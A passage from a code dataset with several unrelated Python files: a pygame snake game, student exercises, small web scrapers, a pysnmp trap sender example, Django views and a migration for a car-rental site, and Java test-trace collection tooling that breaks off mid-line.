< 1 or head_position[1] < 1 or\n head_position[0] >= HEIGHT + 1 or head_position[1] >= WIDTH + 1)\n\n\ndef draw_boundary(surface):\n for y in range(HEIGHT + 2):\n surface.blit(boundaryblock, (0, y * snake.BLOCK_SIZE))\n surface.blit(boundaryblock, ((WIDTH + 1) *\n snake.BLOCK_SIZE, y * snake.BLOCK_SIZE))\n\n for x in range(WIDTH + 2):\n surface.blit(boundaryblock, (x * snake.BLOCK_SIZE, 0))\n surface.blit(boundaryblock, (x * snake.BLOCK_SIZE,\n (HEIGHT + 1) * snake.BLOCK_SIZE,))\n\n\npygame.init()\n\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode(\n ((WIDTH + 2) * snake.BLOCK_SIZE, (HEIGHT + 2) * snake.BLOCK_SIZE))\nscreen.fill((0, 0, 0))\n\n# initialize\nsnek = snake.snake(screen, WIDTH / 2, HEIGHT / 2)\nfd = food.food(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n\n# ensure food does not appear in snake body\nwhile fd.get_position() in snek.get_body_positions():\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n\n\ndraw_boundary(screen)\npygame.display.flip()\n\nnum_eaten = 0\n\nrunning = True\nwhile running:\n\n # check crash or move outside the limits\n if not in_game_boundary(snek) or snek.crashed:\n running = False\n\n else:\n\n fd.draw()\n snek.draw()\n draw_boundary(screen)\n pygame.display.flip()\n\n # check if snake eates\n if fd.get_position() == snek.get_head_position():\n snek.grow()\n\n # food should not appear where the snake is\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n while fd.get_position() in snek.get_body_positions():\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n num_eaten += 1\n # increase game speed\n if num_eaten % SPEED_INC == 0:\n SPEED += SPEED_TICK\n\n clock.tick(SPEED)\n\n event = pygame.event.poll()\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n move_dir_current = snek.get_move_dir()\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_UP and move_dir_current != snake.DOWN:\n snek.set_move_dir(snake.UP)\n elif event.key == pygame.K_DOWN and move_dir_current != snake.UP:\n snek.set_move_dir(snake.DOWN)\n elif event.key == pygame.K_RIGHT and move_dir_current != snake.LEFT:\n snek.set_move_dir(snake.RIGHT)\n elif event.key == pygame.K_LEFT and move_dir_current != snake.RIGHT:\n snek.set_move_dir(snake.LEFT)\n\n snek.remove()\n snek.move()\n\nsnek.draw()\ndraw_boundary(screen)\nsnek_body_positions = snek.get_body_positions()\n\n\nfor position in snek_body_positions[1:]:\n screen.blit(snek.backblock, (position[\n 1] * snake.BLOCK_SIZE, position[0] * snake.BLOCK_SIZE))\n pygame.display.flip()\n clock.tick(SHORT)\n\nwhile True:\n # screen.blit(gameovertext,((WIDTH-4)*snake.BLOCK_SIZE/2,HEIGHT*snake.BLOCK_SIZE/2))\n pygame.display.flip()\n sys.exit()\n","sub_path":"snakegame.py","file_name":"snakegame.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400243528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019-03-18 20:52\n# @Author : ZD Liu\n\n\nimport sys\nimport os\nimport csv\nimport gzip\n\ndef process_file(file):\n dic_indicator = {}\n for i in file:\n try:\n if i == []:\n continue\n if i[2] == indicator_of_interest.strip():\n for m in range(len(i)):\n dic_indicator[i[0]] = i[4:]\n except Exception as e:\n pass\n return dic_indicator\n\n\ndef process_maxvalue(dic):\n dic_not_none = {}\n max_value_year = {}\n for dic_key in dic.keys():\n for i in range(len(dic[dic_key])):\n if dic[dic_key][i] == '':\n pass\n else:\n dic_not_none[(dic_key,i+first_year)] = float(dic[dic_key][i])\n max_value = max(dic_not_none.values())\n for key in dic_not_none.keys():\n if dic_not_none[key] == max_value:\n if key[1] in max_value_year.keys():\n max_value_year[key[1]].append(key[0])\n else:\n max_value_year[key[1]] = [key[0]]\n return max_value, max_value_year\n\nfilename = 'HNP_Data.csv.gz'\nif not os.path.exists(filename):\n print(f'There is no file named {filename} in the working directory, giving up...')\n sys.exit()\n\nindicator_of_interest = input('Enter an Indicator Name: ')\n\nfirst_year = 1960\nnumber_of_years = 56\nmax_value = None\ncountries_for_max_value_per_year = {}\n\nwith gzip.open(filename) as csvfile:\n file = csv.reader(line.decode('utf8').replace('\\0', '') for line in csvfile)\n res_dic = process_file(file)\n if len(res_dic.keys()) > 0:\n max_value , countries_for_max_value_per_year = process_maxvalue(res_dic)\n if max_value != None :\n if max_value % 1 ==0:\n max_value = int(max_value)\n\n\nif max_value is None:\n print('Sorry, either the indicator of interest does not exist or it has no data.')\nelse:\n print('The maximum value is:', max_value)\n print('It was reached in these years, for these countries or categories:')\n print('\\n'.join(f' {year}: {countries_for_max_value_per_year[year]}'\n for year in sorted(countries_for_max_value_per_year)\n )\n )\n\n\n\n","sub_path":"unsw-it-9021/python-code/quiz4/quiz4_submission.py","file_name":"quiz4_submission.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"235794402","text":"# https://www.codeeval.com/open_challenges/16/\r\n# COMPLETED 07.08.2016\r\n\r\n'''\r\nWrite a program which determines the number of 1 bits in the internal representation of a given integer.\r\n'''\r\n\r\ntest_cases = ['10','22','56']\r\n\r\nfor test in test_cases:\r\n test = test.strip()\r\n test = bin(int(test))\r\n count = 0\r\n for x in test:\r\n if x == '1':\r\n count += 1\r\n print(count)","sub_path":"Medium/Number of Ones 0708/numOnes.py","file_name":"numOnes.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249218133","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nurl = 'https://forecast.weather.gov/MapClick.php?lat=37.7772&lon=-122.4168#.XAz1Ty4zbdg'\n\npage = requests.get(url)\n\n# BeautifulSoup Class\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# Filtering data\nseven_day = soup.find('div', id = 'seven-day-forecast')\nforecast_items = seven_day.find_all(class_ = 'tombstone-container')\n\n# Getting indv info\ntemperature = [x.get_text() for x in seven_day.select(\".tombstone-container .temp\")]\n\nweather = [x.get_text() for x in seven_day.select(\".tombstone-container .short-desc\")]\n\nday = [x.get_text() for x in seven_day.select(\".tombstone-container .period-name\")]\n\n# Creating a dataframe\nweek = pd.DataFrame({'Temperature': temperature,\n\t\t 'Weather': weather}, index = day)\nprint(week)\n","sub_path":"weather_forecast.py","file_name":"weather_forecast.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125807290","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('moocs', '0006_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Language',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('language_name', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='University',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('abbreviation', models.TextField()),\n ('full_name', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='mooc',\n name='pub_date',\n ),\n migrations.AddField(\n model_name='mooc',\n name='beging_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 4, 6, 14, 53, 7, 186623, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='mooc',\n name='end_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 4, 6, 14, 53, 12, 578577, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='mooc',\n name='language',\n field=models.ForeignKey(related_name='mooc_language', null=True, to='moocs.Language'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='mooc',\n name='subtitles',\n field=models.ForeignKey(related_name='mooc_subtitles_language', null=True, to='moocs.Language'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='mooc',\n name='workload',\n field=models.IntegerField(default=4),\n preserve_default=False,\n ),\n ]\n","sub_path":"moocs/migrations/0007_auto_20150406_1753.py","file_name":"0007_auto_20150406_1753.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51113782","text":"import ROOT as r\nimport Plotter as p\n \nf = r.TFile('../data/SingleMuon/zskim2018D/CSCDigiTree-Full.root')\ncan = p.Canvas(lumi='')\n \npt_h = f.Get('h_muonCuts')\n \n \npt = p.Plot(pt_h,'', legType='',option='hist')\n\ncan.addMainPlot(pt, color=r.kBlue)\npt.scaleTitleOffsets(1.2,'Y')\n#can.makeLegend(pos='tl')\n \ncan.cleanup('muonCuts.pdf', mode='BOB')#","sub_path":"CSCPatterns/python/3layerplots/make3LayerCLCTPlots_muonCuts.py","file_name":"make3LayerCLCTPlots_muonCuts.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408316096","text":"\"\"\"Script to gather IMDB keywords from 2013's top grossing movies.\"\"\"\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nURL = \"http://www.imdb.com/search/title?at=0&sort=boxoffice_gross_us,desc&start=1&year=2013,2013\"\n\ndef get_top_grossing_movie_links(url):\n \"\"\"Return a list of tuples containing the top grossing movies of 2013 and link to their IMDB\n page.\"\"\"\n response = requests.get(url)\n movies_list = []\n print (response)\n for each_url in BeautifulSoup(response.text).select('.title a[href*=\"title\"]'):\n movie_title = each_url.text \n if movie_title != 'X':\n movies_list.append((movie_title, each_url['href']))\n return movies_list\n\n\nmovies = get_top_grossing_movie_links(URL)\nwith open('output.csv', 'w') as output:\n csvwriter = csv.writer(output)\n for title, url in movies: \n csvwriter.writerow([title, \"http://www.imdb.com\"+ url])","sub_path":"PythonApplication1/PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290602919","text":"#lesson1\n\n# ДЗ1 Поработайте с переменными, создайте несколько, выведите на экран, запросите у пользователя несколько\n# чисел и строк и сохраните в переменные, выведите на экран.\n\nnumber_a = int(input('Введите первое число: '))\nnumber_b = int(input('Введите второе число: '))\nprint(number_a)\nprint(number_b)\n\n# ДЗ2 Пользователь вводит время в секундах. Переведите время в часы, минуты и секунды и выведите в формате чч:мм:сс.\n# Используйте форматирование строк.\n\ntime = int(input('Введите время в секундах: '))\ntime_h = time // 3600\ntime_m = (time-time_h*3600) // 60\ntime_s = time % 60\nprint('Время',time_h, ':', time_m, ':', time_s)\n\n# ДЗ3 Узнайте у пользователя число n. Найдите сумму чисел n + nn + nnn. Например, пользователь ввёл число 3.\n# Считаем 3 + 33 + 333 = 369.\n\nnumber = (input('Введите число: '))\nnumber_a = (number + number)\nnumber_a = int(number_a)\nnumber_b = (number + number + number)\nnumber_b = int(number_b)\nnumber = int(number)\nsum = int(number + number_a + number_b)\nprint(sum)\n\n# ДЗ4 Пользователь вводит целое положительное число. Найдите самую большую цифру в числе.\n# Для решения используйте цикл while и арифметические операции\n\n\nn = int(input(\"Введите целое положительное число \"))\nmax = n % 10\nwhile n >= 1:\n n = n // 10\n if n % 10 > max:\n max = n % 10\n if n > 9:\n continue\n else:\n print(\"Максимальное цифра в числе \", max)\n break\n\n\n\n# ДЗ 5 Запросите у пользователя значения выручки и издержек фирмы. Определите, с каким финансовым результатом\n# работает фирма (прибыль — выручка больше издержек, или убыток — издержки больше выручки). Выведите соответствующее\n# сообщение. Если фирма отработала с прибылью, вычислите рентабельность выручки (соотношение прибыли к выручке).\n# Далее запросите численность сотрудников фирмы и определите прибыль фирмы в расчете на одного сотрудника.\n\nproceeds = int(input('Введиту выручку организации: '))\nlesion = int(input('Введите убыток организации: '))\nif proceeds > lesion:\n print('Ваша фирма работает с прибылью')\n profitability = proceeds / lesion\n print(f'Рентабельность вашей фирмы {profitability :%}')\n sotrudniki = int(input('Сколько у вас сотрудников: '))\n profitability_sot = (proceeds - lesion) / sotrudniki\n print(f'Прибыль на одного сотрудника {profitability_sot} рублей')\nelse:\n print('Ваша фирма работает с убытком')\n \n\n# ДЗ 6 Спортсмен занимается ежедневными пробежками. В первый день его результат составил a километров.\n# Каждый день спортсмен увеличивал результат на 10 % относительно предыдущего. Требуется определить номер дня,\n# на который общий результат спортсмена составить не менее b километров. Программа должна принимать\n# значения параметров a и b и выводить одно натуральное число — номер дня.\n\ndistance = int(input('Сколько километров пробегает спортсмен: '))\ndistance_const = int(input('Количество километров: '))\n\nday = 1\nwhile distance < distance_const:\n day +=1\n distance *= 1.1\nprint(day)\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9860219","text":"from django.shortcuts import redirect, render\nfrom django.contrib.sites.models import get_current_site\nfrom django.utils import translation\nfrom django.utils.encoding import force_text\nfrom django.core.urlresolvers import reverse\n\nfrom .forms import ContactForm\n\nfrom core.utils.views import JsonResponse\nfrom core.utils.helpers import clean_sting, send_mail\n\ndef contacts(request):\n template = 'contacts/contacts.html'\n if request.method == 'POST':\n lang = translation.get_language()\n form = ContactForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n addresses = \"gav@bodun.org, gav-gav@bodun.org\"\n recipients = [x.strip() for x in clean_sting(addresses).split(',')]\n site = get_current_site(request)\n ctx_dict = {\n 'site': site,\n 'phone': data.get('phone'),\n 'name': data.get('name'),\n 'email': data.get('email'),\n 'message': data.get('message'),\n }\n send_mail(recipients,\n 'contacts/mail/email_subject.txt',\n 'contacts/mail/email.html',\n 'contacts/mail/email.txt',\n ctx_dict)\n return JsonResponse({'success': True, 'location': reverse('contacts_thank_you')})\n else:\n errors = dict([(k, force_text(v[0])) for k, v in form.errors.items()])\n return JsonResponse({'success': False, 'errors': errors})\n else:\n form = ContactForm()\n ctx = {'form': form}\n return render(request, template, ctx)\n\n\ndef thank_you(request):\n template = 'contacts/thank_you.html'\n ctx = {}\n return render(request, template, ctx)\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400795920","text":"#!/usr/bin/python3\n'''evaluates candidates applying for a back-end position'''\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = 'https://api.github.com/repos/{}/{}/commits'\\\n .format(sys.argv[2], sys.argv[1])\n r = requests.get(url)\n data = r.json()\n for i in range(len(data)):\n if i < 10:\n print('{}: {}'.format(data[i]['sha'],\n data[i]['commit']['author']['name']))\n else:\n break\n","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"181307833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@File : sendtrap.py\n@Author: sh\n@Date : 2019/1/24\n@Desc :\n\"\"\"\nfrom pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher\nfrom pysnmp.carrier.asyncore.dgram import udp, udp6\nfrom pyasn1.codec.ber import encoder\nfrom pysnmp.proto import api\n\n\n#发送snmptrap\n# Protocol version to use\n# pMod = api.protoModules[api.protoVersion1]\n#版本 2c\npMod = api.protoModules[api.protoVersion2c]\n\n# Build PDU\ntrapPDU = pMod.TrapPDU()\npMod.apiTrapPDU.setDefaults(trapPDU)\n\n\n# Traps have quite different semantics across proto versions\nif pMod == api.protoModules[api.protoVersion1]:\n pMod.apiTrapPDU.setEnterprise(trapPDU, (1, 3, 6, 1, 1, 2, 3, 4, 1))\n pMod.apiTrapPDU.setGenericTrap(trapPDU, 'coldStart')\n # pMod.apiTrapPDU.setSpecificTrap(trapPDU, 'news')\nelse:\n #发送内容\n var = []\n oid1 = (1, 3, 6, 1, 4, 1, 2014516, 1, 1, 1, 2, 0)\n val1 = pMod.Integer(1)\n\n oid2 = (1, 3, 6, 1, 4, 1, 2014516, 1, 1, 1, 3, 0)\n val2 = pMod.OctetString('11111111111')\n var.append((oid1, val1))\n var.append((oid2, val2))\n\n pMod.apiTrapPDU.setVarBinds(trapPDU,var)\n# Build message\ntrapMsg = pMod.Message()\npMod.apiMessage.setDefaults(trapMsg)\npMod.apiMessage.setCommunity(trapMsg, 'public')\npMod.apiMessage.setPDU(trapMsg, trapPDU)\n\ntransportDispatcher = AsyncoreDispatcher()\n\n# UDP/IPv4\ntransportDispatcher.registerTransport(\n udp.domainName, udp.UdpSocketTransport().openClientMode()\n)\n#发送服务器地址\ntransportDispatcher.sendMessage(\n encoder.encode(trapMsg), udp.domainName, ('192.168.3.185', 162)\n)\n\n# # UDP/IPv6\n# transportDispatcher.registerTransport(\n# udp6.domainName, udp6.Udp6SocketTransport().openClientMode()\n# )\n# transportDispatcher.sendMessage(\n# encoder.encode(trapMsg), udp6.domainName, ('::1', 162)\n# )\n\n# Dispatcher will finish as all scheduled messages are sent\ntransportDispatcher.runDispatcher()\n\ntransportDispatcher.closeDispatcher()\n","sub_path":"python_pysnmp_example/sendtrap.py","file_name":"sendtrap.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42108313","text":"lr = 0.0\nya = 0\nyu = 0\nfor i in range(401):\n for j in range(301):\n if (i*100+j*125) <= 50000:\n lrt = i*5 + j*4\n if lr < lrt:\n lr = lrt\n ya = i\n yu = j\nprint(ya)\nprint(yu)\nprint(lr)","sub_path":"07-实践-其他/39-演示代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163097010","text":"import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom wypozyczalnia.forms import PlaceAndDate, Sam, Sam1\nfrom wypozyczalnia.models import Samochod, Miejsce, Rezerwacje\n\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = PlaceAndDate(request.POST)\n if form.is_valid():\n request.session['miejsce_odb'] = form.cleaned_data.get('miejsce_odb')\n request.session['miejsce_zwr'] = form.cleaned_data.get('miejsce_zwr')\n request.session['data_odb'] = form.cleaned_data.get('data_odb')\n request.session['data_zwr'] = form.cleaned_data.get('data_zwr')\n return HttpResponseRedirect('samochody/')\n else:\n x = datetime.date.today()\n today = x.strftime(\"%Y-%m-%d\")\n form = PlaceAndDate()\n return render(request, 'wypozyczalnia/index.html',\n {\"samochody\": Samochod.objects.all, \"miejsca\": Miejsce.objects.all, \"today\": today, \"form\": form})\n\n\ndef samochody(request):\n if request.method == 'POST':\n form = Sam(request.POST)\n if form.is_valid():\n request.session['sam'] = form.cleaned_data.get('sam')\n return HttpResponseRedirect('../szczegoly/')\n else:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n dni = ((datazwr - dataodb).days) + 1\n form = Sam()\n # b = Rezerwacje(klient=request.user, samochod_id=1,\n # miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n # miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n # data_odbioru=dataodb, data_zwrotu=datazwr)\n # b.save()\n return render(request, 'wypozyczalnia/samochody.html',\n {\"samochody\": Samochod.objects.all(),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n \"dni\": dni,\n \"form\": form\n })\n\n\ndef szczegoly(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = Sam1(request.POST)\n if form.is_valid():\n request.session['sam1'] = form.cleaned_data.get('sam')\n return HttpResponseRedirect('../rezerwacja/')\n else:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n dni = ((datazwr - dataodb).days) + 1\n form = Sam()\n # b = Rezerwacje(klient=request.user, samochod_id=1,\n # miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n # miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n # data_odbioru=dataodb, data_zwrotu=datazwr)\n # b.save()\n return render(request, 'wypozyczalnia/szczegoly.html',\n {\"s\": Samochod.objects.get(id=request.session['sam']),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n \"dni\": dni,\n \"form\": form,\n })\n else:\n return redirect('wypozyczalnia:logowanie')\n\n\ndef rezerwacja(request):\n if request.user.is_authenticated:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n b = Rezerwacje(klient=request.user, samochod_id=request.session['sam1'],\n miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n data_odbioru=dataodb, data_zwrotu=datazwr)\n b.save()\n return render(request, 'wypozyczalnia/rezerwacja.html',\n {\"s\": Samochod.objects.get(id=request.session['sam1']),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n })\n else:\n return redirect('wypozyczalnia:logowanie')\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"New account created: {username}\")\n login(request, user)\n return redirect(\"main:homepage\")\n\n else:\n for msg in form.error_messages:\n messages.error(request, f\"{msg}: {form.error_messages[msg]}\")\n\n return render(request=request,\n template_name=\"wypozyczalnia/rejestracja.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request=request,\n template_name=\"wypozyczalnia/rejestracja.html\",\n context={\"form\": form})\n\n\ndef logout_request(request):\n logout(request)\n messages.info(request, \"Wylogowano!\")\n return redirect(\"/\")\n\n\ndef login_request(request):\n if request.method == 'POST':\n form = AuthenticationForm(request=request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"Jesteś zalogowany jako {username}\")\n return redirect('/')\n else:\n messages.error(request, \"Zły login lub hasło.\")\n else:\n messages.error(request, \"Zły login lub hasło.\")\n form = AuthenticationForm()\n return render(request=request,\n template_name=\"wypozyczalnia/logowanie.html\",\n context={\"form\": form})\n","sub_path":"wypozyczalnia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"476986607","text":"def movingTiles(l, s1, s2, queries):\n t=1\n S1 = l*s1*t\n S2 = l*s2*t\n for query in queries:\n t=1\n while (query != (((l*s1*t)-(l*s2*t))**2)):\n print((S1-S2)**2)\n t=t+1\n print(t)\n\n\ndef timeConversion(s):\n temp = s.split(':')\n if s[-2]=='P':\n print( str(int(s[0:2])+12)+':'+s[3:5]+':'+s[6:8] )\n","sub_path":"sherlocksquares.py","file_name":"sherlocksquares.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"471854001","text":"\"\"\"\nModule Description\n\"\"\"\nimport subprocess\nimport re\nimport os\nimport logging\nimport json\nfrom shutil import copyfile\nfrom shutil import rmtree\nfrom pathlib import Path\nimport plyj.parser as plyj\nimport plyj.model as model\nfrom Utility.progress_bar import ProgressBar\nimport sqlite3\nimport glob\nimport random\nimport uuid\n\n# region CONSTS\n\nMAX_SIZE_FOR_TRACE_FILE_IN_MB = 20\nPROJECT_ROOT_PATH = r\"C:\\personal-git\\apache\\commons-math\"\nTRACES_LOG_FILE_PATH = f\"{PROJECT_ROOT_PATH}\\\\traces0.log\"\nDATA_PATH = r\"C:\\personal-git\\Thesis\\ThesisScripts\\data\"\nBUG_DBS_PATH = r\"C:\\personal-git\\Thesis\\ThesisScripts\\bugdbs\"\n\n# endregion\n\n# region Logger Setup\nlogger = logging.getLogger('logger')\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nformatter = logging.Formatter('[%(asctime)s | %(levelname)s] - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\nrandom.seed(7)\n# endregion\n\n\nclass Trace(object):\n def __init__(self, tmid, trace_str):\n trace_str = trace_str.rstrip('\\n')\n trace_str = trace_str.rstrip('\\r')\n self.tmid = tmid\n self.mid = trace_str[:trace_str.find(',')]\n self.vector = trace_str[trace_str.find(',')+1:]\n\n\nclass ExperimentInstance(object):\n def __init__(self, tinfo_lst):\n self.tinfo_lst = tinfo_lst\n\n\nclass TestInfo(object):\n def __init__(self, tfile_full_path, tfile_name, tmethod_name, tannotations_lst):\n self.tfile_full_path = tfile_full_path\n self.tfile_name = tfile_name\n self.tmethod_name = tmethod_name\n self.tmethod_fullname = f\"{tfile_name}.{tmethod_name}\"\n self.tannotations = tannotations_lst\n self.is_faulty = None\n\n def add_result_from_output(self, test_output_str_result):\n resultidx = test_output_str_result.rfind(\"Tests run: 1\")\n result_dirty = test_output_str_result[resultidx:]\n result = result_dirty[:result_dirty.find('\\n')]\n result_vector = re.findall('\\\\b\\\\d+\\\\b', result) #['19', '0', '0', '0']\n result_vector = list(map(int, result_vector))\n num_of_tests, failures, errors, skipped = result_vector\n if num_of_tests > 1:\n raise ValueError(f'expected only 1 test, received {num_of_tests} tests')\n self.is_faulty = (failures + errors > 0)\n if skipped > 0:\n raise ValueError(f\"test was skipped\")\n\n\nclass TestSuitInformation(object):\n def __init__(self, tfiles_paths_list):\n self.tinfos = []\n for tfile_path in tfiles_paths_list:\n tfile_name = Path(tfile_path).stem\n tmethodnameTannotations = SimpleJavaTestFileParser.parse_and_return_methodnameTannotations(tfile_path)\n for (tmethod_name, annotations) in tmethodnameTannotations:\n self.tinfos.append(TestInfo(tfile_path, tfile_name, tmethod_name, annotations))\n \n def filter_in_valid_tests(self):\n tinfos_filtered = []\n for tinfo in self.tinfos:\n isTest = 'Test' in tinfo.tannotations\n isDeprecated = 'Deprecated' in tinfo.tannotations\n isIgnore = 'Ignore' in tinfo.tannotations\n if isTest and not isDeprecated and not isIgnore:\n tinfos_filtered.append(tinfo)\n self.tinfos = tinfos_filtered\n \n def filter_out_big_trace_files(self, max_size_in_mb):\n filtered_count = 0\n for (idx, tinfo) in enumerate(self.tinfos):\n tmethod_dir_path = f\"{DATA_PATH}\\\\{tinfo.tfile_name}\\\\{tinfo.tmethod_name}\"\n traces_file_path = f\"{tmethod_dir_path}\\\\test_method_traces.log\"\n statinfo = os.stat(traces_file_path)\n size_b = statinfo.st_size\n size_mb = (size_b >> 20)\n logger.info(f\"{traces_file_path} size: {size_mb} MB, max size allowed: {max_size_in_mb}\")\n if size_mb > max_size_in_mb:\n filtered_count += 1\n logger.info(f\"filtering {traces_file_path}. size: {size_mb} MB, max size allowed: {max_size_in_mb}\")\n portion = float(max_size_in_mb)/float(size_mb)\n small_file_path = f\"{tmethod_dir_path}\\\\test_method_traces_small.log\"\n with open(traces_file_path, \"r\") as big_file, open(small_file_path, \"w\") as small_file:\n for l in big_file:\n if random.random() < portion:\n small_file.write(l)\n os.remove(traces_file_path)\n os.rename(small_file_path, traces_file_path)\n statinfo = os.stat(traces_file_path)\n size_b = statinfo.st_size\n size_mb = (size_b >> 20)\n logger.info(f\"{traces_file_path} file size was changed to: {size_mb} MB\")\n return filtered_count\n\n\nclass SimpleJavaTestFileParser(object):\n parser = plyj.Parser()\n\n @staticmethod\n def old_get_tmethods_lines(java_tfile_path):\n with open(java_tfile_path, 'r') as tfile:\n store_next_line = False\n tmethods_lines = []\n for idx, line in enumerate(tfile):\n if store_next_line:\n tmethods_lines.append(line)\n store_next_line = False\n continue\n line = line.rstrip('\\n').strip('\\t').strip(' ')\n if line == '@Test':\n store_next_line = True\n return tmethods_lines\n\n @staticmethod\n def old_parse(java_test_file_path):\n tmethods_lines = SimpleJavaTestFileParser.old_get_tmethods_lines(java_test_file_path)\n tmethod_names = []\n for line in tmethods_lines:\n line_split = line.rstrip('\\n').strip('\\t').strip(' ').split(' ')\n if line_split[0] != 'public':\n #is not a valid case (e.g. @ignore)\n continue\n methodname_w_brackets = list(filter(lambda w: '(' in w, 